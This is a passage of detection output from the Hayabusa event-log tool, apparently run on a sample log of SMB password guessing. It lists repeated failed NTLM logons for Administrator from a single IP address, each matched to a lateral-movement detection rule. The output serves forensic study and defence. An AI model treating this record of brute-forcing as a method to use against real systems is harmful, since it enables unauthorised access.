NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: 